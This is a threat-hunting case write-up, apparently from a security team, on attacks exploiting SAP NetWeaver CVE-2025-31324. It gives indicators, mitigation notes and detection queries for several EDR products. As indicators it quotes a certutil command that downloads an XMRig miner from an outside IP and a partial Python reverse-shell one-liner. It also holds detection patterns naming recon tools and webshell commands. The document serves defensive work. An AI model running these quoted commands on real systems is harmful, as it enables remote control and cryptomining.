Hunter-Case-04 - SAP Netweaver CVE-2025-31324 - Webserver Webshells

- Webshell Activity, XMRig Cryptominer and Ransomware

1.) Information

Hunter Blue's day started with a lot of interesting Cases on 3 different customer EDR/XDR Sensor environments to be able to compare which Systems detected this current vulnerability infection in early stages.

Devices alerted in SOC Department which we also hunt through our monthly Threat Hunting Service.

Threat actors involved in cryptomining malware or Ransomware infection distribution leverage quite curious techniques.

It abuses SAP Netweaver Public available intances to run a cryptominer, webshell or ransomware.

The Attackchain was only partly prevented by XDR Systems andthere are some essential things you should know how to investigate the right way.

You should investigate the initial Entry and Execution to search through the logs with these IoCs / IoAs to find the right artifacts for Threat Hunting.

1.1) Information Links and Research

Affected Component: The vulnerability exists in the SAP Visual Composer component for SAP NetWeaver 7.xx (all SPS), specifically within the “developmentserver” part of the application. This component is part of the SAP NetWeaver Java stack. While not installed by default, it is widely enabled across existing SAP NetWeaver Application Server Java systems due to its broad usefulness in assisting business process specialists with developing business components without the use of coding.

Root Cause: The fundamental issue is an Improper authentication and authorization check in the application. This means the Metadata Uploader is not protected when an unauthenticated user wants to leverage some of its functionality.

Vulnerability Type: As the vulnerability relies on the fact that no authentication is enforced when accessing certain privileged functionality, the type of vulnerability can be associated with CWE ID: CWE-862 Missing Authorization or CWE-306: Missing Authentication for Critical Function.

Criticality: The vulnerability has been graded with a CVSS of 10, since it allows for a full system compromise, if successfully exploited.

Exploitation Method: The vulnerability is exploitable through HTTP/HTTPS, potentially over the Internet. Attackers target the /developmentserver/metadatauploader URL by sending carefully crafted POST requests.

Authentication Requirement: No authentication is required to exploit it, allowing unauthenticated agent or unauthenticated threat actors to interact with the vulnerable component.

Technical Impact: The exploitation allows arbitrary file upload. Threat actors can upload potentially malicious code files, most commonly webshells. Examples of filenames observed include “helper.jsp” and “cache.jsp”.

2.) Indicators of Compromise

2.1) Indicators of Compromise Webshell

SAP has provided guidance on determining if systems have already been compromised in.SAP Note #3596125 – this note details the following steps:

Check the root of the following OS directories for the presence of ‘jsp’, ‘java’, or ‘class’ files.

C:\usr\sap\<SID>\<InstanceID>\j2ee\cluster\apps\sap.com\irj\servlet_jsp\irj\root
C:\usr\sap\<SID>\<InstanceID>\j2ee\cluster\apps\sap.com\irj\servlet_jsp\irj\work
C:\usr\sap\<SID>\<InstanceID>\j2ee\cluster\apps\sap.com\irj\servlet_jsp\irj\work\sync

The presence of these files is an indication an attacker has leveraged the vulnerability to upload arbitrary files. The system should be considered compromised and the appropriate incident response plan should be followed.

The following image illustrates a potential review of a given SAP Application:

[root@sapserver irj]# pwd /usr/sap/<SID>/<INSTANCE>/j2ee/cluster/apps/sap.com/irj/servlet_jsp/irj [root@sapserver irj]# find . -type f -name “*.jsp” -ls [root@sapserver irj]# find . -type f -name “*.java” -ls [root@sapserver irj]# find . -type f -name “*.class” -ls

Observed Tactics

Different tactics have been observed by the Onapsis Research Labs, mapped to the MITRE ATT&CK Framework:

T1190 (Exploit Public-Facing Application)
T1505.003 (Server Software Component: Web Shell)

Additionally, the ReliaQuest research team provided the following IOCs to search across SAP Applications:

Helper.jsp webshell: 1f72bd2643995fab4ecf7150b6367fa1b3fab17afd2abed30a98f075e4913087
Cache.jsp webshell: 794cb0a92f51e1387a6b316b8b5ff83d33a51ecf9bf7cc8e88a619ecb64f1dcf
Random 8-character names ([a-z]{8}).jsp b3e4c4018f2d18ec93a62f59b5f7341321aff70d08812a4839b762ad3ade74ee
Any files with .jsp, .class or .java extensions within the following directories should be considered malicious
- /usr/sap/<SID>/<InstanceID>/j2ee/cluster/apps/sap.com/irj/servlet_jsp/irj/root
- /usr/sap/<SID>/<InstanceID>/j2ee/cluster/apps/sap.com/irj/servlet_jsp/irj/work
- /usr/sap/<SID>/<InstanceID>/j2ee/cluster/apps/sap.com/irj/servlet_jsp/irj/work/sync

2.2) XMRig Cryptominer Download to Public directory

certutil -urlcache -split -f http://23.95.123[.]5:666/xmrigCCall/s.exe C:\Users\Public\s.exe

2.3) Python Reverseshell connection

⤷ /bin/sh -c cd ";pwd;echo ";python3 -c 'import os,pty,socket;s=socket.socket();s.connect(("u<redac>......com",443));[os.dup2(s.fileno(),f)

3.) Initial Access

3.1) Infection execution commands

4.) Finding through Threat Hunting

We hunted through the Datalake logs in the whole infrastructure and, yes you guess it right, we found the early stage in this attack chain on hosts executing the malicious file.

5.) Mitigation

SAP has released the following notes to help customers protect themselves from this active threat:

SAP Security Note #3594142 – Provides the hot fix support packages to help patch the vulnerability. Also points to SAP Note #3596125 and initial manual actions to identify evidence of prior exposure
SAP Note #3596125 – FAQ for Security Note #3594142. Please note that this document is evolving, and SAP continues to update and evolve this FAQ and guidance.
SAP Note #3593336 – Provides workaround mitigation steps for customers that cannot apply the patch
https://securitybridge.com/blog/cve-2025-31324/
SAP: https://onapsis.com/blog/active-exploitation-of-sap-vulnerability-cve-2025-31324/

6.) Detection and Hunting

6.1) Sigma Rules

id: CVE-2025-31324

info:
  name: CVE-2025-31324
  author: rxerium
  severity: critical
  description: |
    SAP NetWeaver Visual Composer Metadata Uploader is not protected with a proper authorization, allowing unauthenticated agent to upload potentially malicious executable binaries that could severely harm the host system. This could significantly affect the confidentiality, integrity, and availability of the targeted system.
  metadata:
    verified: true
    max-request: 1
    shodan-query: http.favicon.hash:-266008933
    product: content_server
    vendor: sap
  tags: sap,webserver,tech,zero-day

http:
  - method: GET
    path:
      - "{{BaseURL}}"

    redirects: true
    max-redirects: 2
    matchers-condition: and
    matchers:
      - type: word
        part: header
        words:
          - "SAP NetWeaver Application Server"
        condition: or
        case-insensitive: true

      - type: regex
        part: header
        name: version-check
        regex:
          - (?i)SAP NetWeaver Application Server 7\.(0[0-9]|[1-4][0-9]|50)(\b|[^0-9])

    extractors:
      - type: kval
        part: header
        kval:
          - "server"

6.2) Linux Commandline Hunting

[root@sapserver irj]# pwd
/usr/sap/<SID>/<INSTANCE>/j2ee/cluster/apps/sap.com/irj/servlet_jsp/irj
[root@sapserver irj]# find . -type f -name “*.jsp” -ls
[root@sapserver irj]# find . -type f -name “*.java” -ls
[root@sapserver irj]# find . -type f -name “*.class” -ls

6.3) Hunting Queries Microsoft Defender XDR

###WEBSHELL-HUNT01 - CVE-2025-31324 - Unfamiliar files found in SAP NetWeaver Java file system
DeviceFileEvents
| where ActionType == "FileCreated"
| where FileName endswith ".jsp" or FileName endswith ".java" or FileName endswith ".class"
| where FolderPath has_any ("\\irj\\root\\", "\\irj\\work\\", "\\irj\\work\\sync\\", "\\inetpub\\wwwroot\\aspnet_client\\", "\\frontend\\httpproxy\\owa\\auth\\", "\\frontend\\httpproxy\\ecp\\auth\\)")


###WEBSHELL-HUNT01 - CVE-2025-31324 - check for Public Facing SAP NetWeaver instances
let InternetFacing =
DeviceInfo
| where IsInternetFacing == true and isnotempty(PublicIP)
| distinct DeviceId;
DeviceProcessEvents
| where TimeGenerated > ago(90d)
| where InitiatingProcessVersionInfoProductName has "netweaver"
| summarize arg_max(TimeGenerated, *) by DeviceId
| where DeviceId has_any(InternetFacing)



##Other Webshell Activity

###WEBSHELL-HUNT01 - Executed Processes
DeviceProcessEvents | where ((((InitiatingProcessFolderPath endswith @"\w3wp.exe" or InitiatingProcessFolderPath endswith @"\php-cgi.exe" or InitiatingProcessFolderPath endswith @"\nginx.exe" or InitiatingProcessFolderPath endswith @"\httpd.exe" or InitiatingProcessFolderPath endswith @"\caddy.exe" or InitiatingProcessFolderPath endswith @"\ws_TomcatService.exe" or InitiatingProcessFolderPath endswith @"\tomcat.exe" or InitiatingProcessFolderPath endswith @"\UMWorkerProcess.exe") or ((InitiatingProcessFolderPath endswith @"\java.exe" or InitiatingProcessFolderPath endswith @"\javaw.exe") and (InitiatingProcessFolderPath contains "-tomcat-" or InitiatingProcessFolderPath contains @"\tomcat")) or ((InitiatingProcessFolderPath endswith @"\java.exe" or InitiatingProcessFolderPath endswith @"\javaw.exe") and (InitiatingProcessCommandLine contains "catalina.jar" or InitiatingProcessCommandLine contains "CATALINA_HOME" or InitiatingProcessCommandLine contains "catalina.home"))) and (FolderPath endswith @"\cmd.exe" or FolderPath endswith @"\sh.exe" or FolderPath endswith @"\bash.exe" or FolderPath endswith @"\powershell.exe" or FolderPath endswith @"\pwsh.exe" or FolderPath endswith @"\bitsadmin.exe" or FolderPath endswith @"\arp.exe" or FolderPath endswith @"\at.exe" or FolderPath endswith @"\certutil.exe" or FolderPath endswith @"\dsget.exe" or FolderPath endswith @"\dsquery.exe" or FolderPath endswith @"\find.exe" or FolderPath endswith @"\findstr.exe" or FolderPath endswith @"\fsutil.exe" or FolderPath endswith @"\hostname.exe" or FolderPath endswith @"\ipconfig.exe" or FolderPath endswith @"\nbtstat.exe" or FolderPath endswith @"\net.exe" or FolderPath endswith @"\net1.exe" or FolderPath endswith @"\netdom.exe" or FolderPath endswith @"\netsh.exe" or FolderPath endswith @"\netstat.exe" or FolderPath endswith @"\nltest.exe" or FolderPath endswith @"\nslookup.exe" or FolderPath endswith @"\ntdutil.exe" or FolderPath endswith @"\pathping.exe" or FolderPath endswith @"\ping.exe" or FolderPath endswith @"\qprocess.exe" or FolderPath endswith @"\query.exe" or FolderPath endswith @"\qwinsta.exe" or FolderPath endswith @"\reg.exe" or FolderPath endswith @"\rundll32.exe" or FolderPath endswith @"\sc.exe" or FolderPath endswith @"\schtasks.exe" or FolderPath endswith @"\systeminfo.exe" or FolderPath endswith @"\tasklist.exe" or FolderPath endswith @"\tracert.exe" or FolderPath endswith @"\ver.exe" or FolderPath endswith @"\vssadmin.exe" or FolderPath endswith @"\wevtutil.exe" or FolderPath endswith @"\whoami.exe" or FolderPath endswith @"\wmic.exe" or FolderPath endswith @"\wusa.exe")) and not ((ProcessCommandLine endswith @"Windows\system32\cmd.exe /c C:\ManageEngine\ADManager \"Plus\ES\bin\elasticsearch.bat -Enode.name=RMP-NODE1 -pelasticsearch-pid.txt") or (ProcessCommandLine contains "sc query" and ProcessCommandLine contains "ADManager Plus")))


###WEBSHELL-HUNT02 - Parent Process and Child Process
DeviceProcessEvents | where ((InitiatingProcessFolderPath endswith @"\w3wp.exe" or InitiatingProcessFolderPath endswith @"\httpd.exe" or InitiatingProcessFolderPath endswith @"\nginx.exe" or InitiatingProcessFolderPath endswith @"\php-cgi.exe" or InitiatingProcessFolderPath endswith @"\tomcat.exe" or InitiatingProcessFolderPath endswith @"\UMWorkerProcess.exe") and (FolderPath endswith @"\cmd.exe" or FolderPath endswith @"\sh.exe" or FolderPath endswith @"\bash.exe" or FolderPath endswith @"\powershell.exe" or FolderPath endswith @"\bitsadmin.exe"))

6.4) Hunting Queries Palo Cortex XDR

###WEBSHELL-HUNT01 - CVE-2025-31324 - Unfamiliar files found in SAP NetWeaver Java file system
config case_sensitive = false | dataset = xdr_data
| filter event_type = FILE
and event_sub_type in (FILE_WRITE, FILE_CREATE_NEW)
and action_file_extension in ("jsp", "java", "class")
and action_file_path ~= "(\\irj\\root\\|\\irj\\work\\|\\irj\\work\\sync\\|\\inetpub\\wwwroot\\aspnet_client\\|\\frontend\\httpproxy\\owa\\auth\\|\\frontend\\httpproxy\\ecp\\auth\\)"
| fields _time, agent_hostname, agent_ip_addresses, actor_effective_username, action_file_extension, action_file_path ,actor_process_image_name,actor_process_image_path ,actor_process_command_line, actor_process_image_sha256, actor_process_signature_vendor








##Other Webshell Activity

###WEBSHELL-HUNT01 - Executed Processes - China Chopper [s]&cd&echo [e] can be removed to hunt for other executions
dataset = xdr_data
|filter event_sub_type = PROCESS_START and lowercase(action_process_image_name) = "cmd.exe" and lowercase(actor_process_image_name) = "w3wp.exe"
|filter lowercase(action_process_image_command_line ) contains "[s]&cd&echo [e]"
|fields agent_hostname, agent_version, actor_effective_username , action_process_image_name, action_process_image_command_line,actor_process_image_name, actor_process_image_command_line



###WEBSHELL-HUNT02 - Executed Processes - Microsoft Internet Information Server (IIS) dropping ASPX files into Exchange and generic IIS loading locations
config case_sensitive = false | dataset = xdr_data
| filter event_type = FILE
and event_sub_type in (FILE_WRITE, FILE_CREATE_NEW)
and action_file_extension = "aspx"
and action_file_path ~= "(\\inetpub\\wwwroot\\aspnet_client\\|\\frontend\\httpproxy\\owa\\auth\\|\\frontend\\httpproxy\\ecp\\auth\\)"
and action_file_path != "*\\frontend\\httpproxy\\ecp\\auth\\timeoutlogoff.aspx"
and actor_process_image_name in ("UMWorkerProcess.exe", "w3wp.exe", "umservice.exe")



###WEBSHELL-HUNT03 - Executed Processes - discovery commands from IIS processes
dataset = xdr_data
|filter lowercase(causality_actor_process_image_name) = "w3wp.exe" and lowercase(actor_process_image_name) in ("cmd.exe", "powershell.exe") and lowercase(action_process_image_name) in ("net.exe", "quser.exe","certutil.exe", "arp.exe","hostname.exe", "whoami.exe", "netstat.exe", "ping.exe", "ipconfig.exe", "wmic.exe", "del.exe")
|fields agent_hostname, agent_version, actor_effective_username , causality_actor_process_image_name, causality_actor_process_command_line , actor_process_image_name, actor_process_command_line, action_process_image_name, action_process_image_command_line



###WEBSHELL-HUNT04 - attackers use compression and memory dumps to stage exfiltration and credential access using C:\programdata as the staging location
config case_sensitive = false
| dataset = xdr_data
|filter event_type = FILE and event_sub_type in (FILE_CREATE_NEW, FILE_WRITE) and agent_os_sub_type contains "server"
|filter action_file_path ~= "c:\\programdata\\[a-zA-Z0-9]+\.(rar|zip|zipx|7z)" OR action_file_path ~= "(c:\\root\\[a-zA-Z0-9]+\.dmp$|c:\\windows\\temp\\[a-zA-Z0-9]+\.dmp$)"



###WEBSHELL-HUNT05 - Exchange worker process does not usually create subprocesses and one of the exploit targets this process
config case_sensitive = false
| dataset = xdr_data
| filter event_type = PROCESS and event_sub_type = PROCESS_START and os_actor_process_image_name = "UMWorkerProcess.exe"
| filter action_process_image_name != "WerFault.exe" and action_process_image_name != "wermgr.exe"




###WEBSHELL-HUNT06 - Detect certutil netcons to public IP addresses. May be observed post-exploit in latest Exchange 0-day attacks for connection checks
config case_sensitive = false
| dataset = xdr_data
| filter event_type = STORY and actor_process_image_name = "certutil.exe" and
actor_process_image_command_line contains ":8080"
| comp count() by agent_hostname, actor_process_image_name, action_external_hostname,
action_remote_ip, action_remote_port, actor_process_command_line
// Filter out connections to private IP addresses
|alter rfc1918_172 = incidr(action_remote_ip, "172.16.0.0/12")
|alter rfc1918_10 =  incidr(action_remote_ip, "10.0.0.0/8")
|alter rfc1918_192 = incidr(action_remote_ip, "192.168.0.0/16")
|filter rfc1918_172 = false and rfc1918_10 = false and rfc1918_192 = false
| fields - rfc1918_10, rfc1918_172, rfc1918_192




###WEBSHELL-HUNT07 - Detect DLL and EXE writes to Public folder (C:\Users\Public\) on possible Exchange hosts. May be used post-exploit as part of latest Exchange 0-day attacks
config case_sensitive = false
| dataset = xdr_data
| filter event_type = FILE and
    	(event_sub_type = ENUM.FILE_WRITE or event_sub_type = ENUM.FILE_CREATE_NEW) and
    	action_file_extension in ("exe", "dll") and
    	action_file_path contains "C:\Users\Public"
| fields event_type, event_sub_type, agent_hostname, actor_effective_username, action_file_path,
action_file_extension, actor_process_image_name, causality_actor_process_image_name
// Show only results on possible Exchange hosts (w3wp.exe process is present)
| join conflict_strategy = right type=inner
	(
    	dataset = xdr_data
    	| filter (event_type = PROCESS and actor_process_image_name = "w3wp.exe")
    	| comp count(event_timestamp) as w3wp_event_count by actor_process_image_name, agent_hostname
    	| fields agent_hostname
	) as w3wp_list w3wp_list.agent_hostname = agent_hostname




###WEBSHELL-HUNT08 - Detection of China Chopper webshell activity
config case_sensitive = false
| dataset = xdr_data 
| filter event_type = ENUM.PROCESS and actor_process_image_name = "w3wp.exe" and (action_process_image_command_line contains "&ipconfig&echo" or action_process_image_command_line contains "&quesr&echo" or action_process_image_command_line contains "&whoami&echo" or action_process_image_command_line contains "&c:&echo" or action_process_image_command_line contains "&cd&echo" or action_process_image_command_line contains "&echo [E]" or action_process_image_command_line contains "&echo [S]")
| fields action_process_image_command_line , actor_process_image_path , actor_effective_username , agent_hostname 




###WEBSHELL-HUNT09 - Detection Suspicious files in Exchange directories
config case_sensitive = false timeframe = 30d
| dataset = xdr_data 
| filter event_type = ENUM.FILE and actor_process_image_name = "w3wp.exe" and action_file_path contains "FrontEnd\HttpProxy" and actor_process_command_line contains "MSExchange"
| fields  actor_effective_username , agent_hostname , actor_process_command_line, action_file_path , action_file_sha256




###WEBSHELL-HUNT10 - Persistence (TA0003):
// Description: WebShells write on the host
config case_sensitive = false
| dataset = xdr_data
| filter agent_os_type = AGENT_OS_LINUX
| filter event_type = ENUM.FILE and (event_sub_type = ENUM.FILE_CREATE_NEW OR event_sub_type = ENUM.FILE_WRITE ) and action_file_path contains "www" and action_file_extension in ("php", "html")
| filter actor_effective_username contains "www-data" and actor_process_image_path contains "apache"
| fields _time, agent_hostname, actor_effective_username, actor_process_image_path, actor_process_command_line,causality_actor_process_command_line, action_process_image_command_line , action_file_path




###WEBSHELL-HUNT11 - Persistence (TA0003):
// Description: Web Shell Activity
config case_sensitive = false
| dataset = xdr_data
| filter agent_os_type = AGENT_OS_LINUX
| filter event_type = ENUM.PROCESS
| filter causality_actor_process_image_path contains "apache"
//Filter for shell activities
| filter actor_process_image_path contains "/bin/bash" OR actor_process_image_path contains "/bin/sh"
// more filtering can be done using actor_effective_username contains "www-data"
| filter (actor_effective_username contains """www-data""")
| fields _time, agent_hostname, actor_effective_username, actor_process_image_path, actor_process_command_line, causality_actor_process_image_path, causality_actor_process_command_line, action_process_image_path, action_process_image_command_line





###WEBSHELL-HUNT12 - Exchange IIS process writing ASPX files to disk
dataset = xdr_data
|filter event_type = FILE AND event_sub_type IN (FILE_CREATE_NEW, FILE_WRITE)
|filter lowercase(actor_process_image_name) = "w3wp.exe"
|filter lowercase(action_file_extension) = "aspx"
|fields agent_hostname, actor_process_image_path, actor_process_image_command_line , action_file_path, action_file_sha256




###WEBSHELL-HUNT13 - Exchange IIS sub process breakdown
dataset = xdr_data
|filter lowercase(os_actor_process_image_name) = "w3wp.exe" and lowercase(os_actor_process_command_line) contains "exchange"
|filter action_process_image_name !=null
|comp count_distinct(action_process_image_command_line) as Count by agent_hostname, causality_actor_process_image_name, action_process_image_name




###WEBSHELL-HUNT14 - Exchange IIS process launching executables commonly used for reconnaissance purposes.
###details on any commonly abused reconnaissance executables spawned by IIS
dataset = xdr_data
|filter os_actor_process_image_name = "w3wp.exe"
|filter event_type = PROCESS and event_sub_type = PROCESS_START and lowercase(action_process_image_name) in ("arp.exe","hostname.exe","ntdutil.exe","schtasks.exe","at.exe","ipconfig.exe","pathping.exe","systeminfo.exe","bitsadmin.exe","nbtstat.exe","ping.exe","tasklist.exe","certutil.exe","net.exe","powershell.exe","tracert.exe","cmd.exe","net1.exe","qprocess.exe","ver.exe","dsget.exe","netdom.exe","query.exe","vssadmin.exe","dsquery.exe","netsh.exe","qwinsta.exe","wevtutil.exe","find.exe","netstat.exe","reg.exe","whoami.exe","findstr.exe","nltest.exe","rundll32.exe","wmic.exe","fsutil.exe","nslookup.exe","sc.exe","wusa.exe")
|fields agent_hostname, os_actor_process_command_line , agent_version, actor_effective_username , action_process_image_name, action_process_image_command_line,actor_process_image_name, actor_process_image_command_line

6.5) Hunting Queries Tanium EDR

###WEBSHELL-HUNT01 - CVE-2025-31324 - Unfamiliar files found in SAP NetWeaver Java file system
Get Trace File Operations[unlimited,1743512580000|1746021789378,1,0,100,0,".*(\\irj\\root\\|\\irj\\work\\|\\irj\\work\\sync\\|\\inetpub\\wwwroot\\aspnet_client\\|\\frontend\\httpproxy\\owa\\auth\\|\\frontend\\httpproxy\\ecp\\auth\\).*\.(jsp|java|class|asp|aspx|cfm|jsp|php)",Create,"","",""] from all machines
Get Trace File Operations[unlimited,1743512580000|1746021789378,1,0,100,0,".*(sap.com).*\.(jsp|java|class|asp|aspx|cfm|jsp|php)",Create,"","",""] from all machines





##Other Webshell Activity


###WEBSHELL-HUNT01 - Executed Processes :
Get Trace Executed Processes[unlimited,1588333583362|1588337182362,0,0,100,1,"",w3wp.exe,"","","",""] from all machines
Get Trace Executed Processes[unlimited,1588333583362|1588337182362,0,0,100,1,"",httpd.exe,"","","",""] from all machines
Get Trace Executed Processes[unlimited,1588333583362|1588337182362,0,0,100,1,"",php-cgi.exe,"","","",""] from all machines
Get Trace Executed Processes[unlimited,1588333583362|1588337182362,0,0,100,1,"",caddy.exe,"","","",""] from all machines
Get Trace Executed Processes[unlimited,1588333583362|1588337182362,0,0,100,1,"",nginx.exe,"","","",""] from all machines
Get Trace Executed Processes[unlimited,1588333583362|1588337182362,0,0,100,1,"",ws_tomcatservice.exe,"","","",""] from all machines


###WEBSHELL-HUNT02 - Parent Process and Child Process
Get Trace Executed Processes[unlimited,1654090734975|1654094333975,1,0,100,1,"(?i).*(w3wp|httpd|php-cgi|caddy|nginx|ws_tomcatservice).exe","(?i).*(cmd|sh|powershell|pwsh|bitsadmin|arp|at|certutil).exe","","","",""] from all machines with Is Windows contains true


###WEBSHELL-HUNT02 - Hunt for File Formats:
Get "Trace File Operations[unlimited, 1488479715768|1488483314768, 1, 0, 0, 10, .*\\wwwroot\\.*\.(asp|aspx|cfm|jsp|php), CreateNewFile, , , ]" from all machines

7.) Conclusion and Learning for a Hunter Blue

The XDR System prevented the Malware Cryptominer Stageing on these Devices but its definitely necessary to check during Hunting or Initial Triage how Malware was staged
-> showcasing how fruitful Compromise Assessment Webshell Hunting and Time Line Analysis can be and should be used in such cases -> it is essential.

PreviousHunter-Case-03 - QRCode Phishing - Quishing Attacks NextHunter-Case-05 - Velociraptor tool abused for remote access

Last updated 8 months ago